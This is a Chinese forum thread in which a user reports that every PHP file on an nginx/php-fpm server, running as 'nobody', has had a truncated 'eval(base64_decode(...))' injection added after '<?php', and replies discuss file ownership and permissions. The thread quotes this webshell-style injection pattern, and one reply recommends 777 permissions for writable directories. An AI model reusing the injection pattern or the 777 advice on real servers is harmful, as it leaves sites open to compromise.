nginx php-fpm权限问题
nginx运行用户:nobody
php-fpm运行用户:nobody
web目录:chown -R nobody /usr/share/nginx/html/*
全是是上面那样设置的,现在发先web下的所有*.php的<?php后面被加了
eval(base64_decode("CmVycm9yX3JlcG9此处省略求科普和解决方法如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(4)
Web服务器运行用户和Web目录所有者不同是最基本的安全原则,要不就会像在Windows开发那样,PHP脚本可以对Web目录甚至Windows系统目录内容进行修改,完全没有安全性可言。
PHP-FPM运行用户可以也建议跟Nginx用户相同。
你这回复和楼上有区别么?
回复
求指导!
楼上的回复,跟没说一样。
你这个文件目录权限安全机制简直是形同虚设,
你这样一来,php可对网站目录中所有文件具有可写权限,当然就不安全了。建议点:
php-fpm以nobody运行
网站文件所有者设置为其它帐号。
针对需要可写的目录,设置777权限